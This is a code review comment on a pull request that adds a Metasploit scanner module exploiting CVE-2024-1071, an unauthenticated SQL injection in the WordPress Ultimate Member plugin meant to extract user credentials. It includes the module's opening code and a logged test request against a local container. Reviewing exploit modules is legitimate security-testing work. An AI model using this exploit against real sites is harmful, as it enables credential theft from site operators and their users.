modules/auxiliary/scanner/http/wp_ultimate_member_sorting_sqli.rb

```diff
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Ultimate Member SQL Injection (CVE-2024-1071)',
+        'Description' => %q{
+          The Ultimate Member plugin for WordPress up to version 2.8.2 is vulnerable to SQL injection via
+          the 'sorting' parameter. This allows unauthenticated attackers to exploit blind SQL injections and
+          extract sensitive information from the database.
+        },
+        'Author' => [
+          'Christiaan Swiers',  # Vulnerability Discovery
+          'Valentin Lobstein'   # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-1071'],
+          ['URL', 'https://github.com/gbrsh/CVE-2024-1071'],
+          ['URL', 'https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/']
+        ],
+        'Actions' => [
+          ['Extract User Credentials', { 'Description' => 'SQL Injection via sorting parameter' }]
+        ],
+        'DefaultAction' => 'Extract User Credentials',
+        'DefaultOptions' => { 'SqliDelay' => 1, 'VERBOSE' => true },
+        'DisclosureDate' => '2024-02-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
+      OptInt.new('DIR_ID_MIN', [true, 'Minimum value for bruteforcing directory IDs', 1]),
+      OptInt.new('DIR_ID_MAX', [true, 'Maximum value for bruteforcing directory IDs', 100])
+    ]
+  end
+
+  def get_nonce
+    print_status('Getting nonce...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'register')
+    })
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+
+    nonce = res.body.scan(/"nonce":"([^"]+)"/).flatten.first
```

Comment:
I think this should be slighty more specific to the Ultimate Member plugin. You can see the PoC looks for `um_scripts\s*` in the string which I think is a good idea:
https://github.com/gbrsh/CVE-2024-1071/blob/main/exploit.py#L43

Before I figured out the issue with the `/register` page I installed the vulnerable plugin on an older WordPress test container of mine with many other plugins installed. When testing this module it picked up the nonce of an unrelated plugin and then was failling with the following response:
```
[+] Nonce retrieved: 3dab178e8c
[*] Searching for valid directory id between 1 and 100...
####################
# Request:
####################
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

action=um_get_members&nonce=3dab178e8c&directory_id=b9238
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 15:54:42 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.17
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Content-Length: 38
Content-Type: application/json; charset=UTF-8

{"success":false,"data":"Wrong Nonce"}
```